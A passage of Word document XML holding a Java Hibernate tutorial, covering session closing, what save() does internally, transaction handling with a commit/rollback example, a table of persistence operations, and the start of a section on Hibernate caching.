        </w:rPr>
        <w:t>tx</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commit</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67480F" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>g) Close Session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916D257" w14:textId="0ED9A0C0"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760902"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>session</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close</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCB9B7" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. What Happens Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D6DD5" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When you call </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>session.save():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714175EF" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Hibernate checks the entity state - determines if it's transient (new), persistent (managed), or detached</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453F6C2B" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Generates SQL - Hibernate creates the appropriate INSERT statement based on your entity mappings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160F316B" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Executes SQL - The statement is executed against the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523659DD" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Updates entity state - The transient object becomes persistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179D059" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00C01A28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Handles ID generation - If using auto-increment, retrieves the generated ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30268D" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Transaction Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843D8CD" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Hibernate operations should be performed within transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF49187"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> session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sessionFactory</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openSession</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7FCCAC"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>try</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1ADBBA27"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Transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> tx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session</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beginTransaction</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A813192"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p>
    <w:p w14:paraId="4957B236"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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Perform operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CAB57"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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> emp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Employee</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Jane Smith"</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60000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32260DC3"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    session</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save</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emp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EAAD8E"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p>
    <w:p w14:paraId="5E1117DF"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    tx</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commi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880000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>// Changes are flushed to database here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CDA672"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catch</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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</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7C77347C"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if</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tx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ull</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tx</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rollback</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0425676C"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throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD3CC7"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finally</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73116E04"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    session</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close</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38792268" w14:textId="750B3EFD"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274DA119" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>6. Different Persistence Operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829FEC4" w14:textId="3336EAA1" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F985F" w14:textId="2BDC084B" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>save()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Persists the object, returns generated ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D252EF6" w14:textId="5CD403F8" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>persist()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Similar to save() but doesn't guarantee immediate ID assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66873A8D" w14:textId="4CA926FF" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>update()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Updates a detached object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE3359" w14:textId="1049DFAE" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>merge()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Copies state of detached object to persistent object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364CE67" w14:textId="7D16BDEB" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>saveOrUpdate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004A5A76" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Either saves or updates based on object state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4EFCA3" w14:textId="77777777" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>7. Hibernate Cache Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C32B836" w14:textId="33ADDE0C" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>First Level Cache (Session cache):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E431B1" w14:textId="77777777" w:rsidR="00024B53" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Exists per session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A801230" w14:textId="77777777" w:rsidR="00024B53" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>All persistent objects are stored here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53787D56" w14:textId="3EF86679" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00024B53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00D706F7" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>leared when session closes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B91E82" w14:textId="00FCE80C" w:rsidR="00D706F7" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7" w:rsidP="00D706F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Second Level Cache (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E791ED2" w14:textId="77777777" w:rsidR="00024B53" w:rsidRPr="00CE4B95" w:rsidRDefault="00D706F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
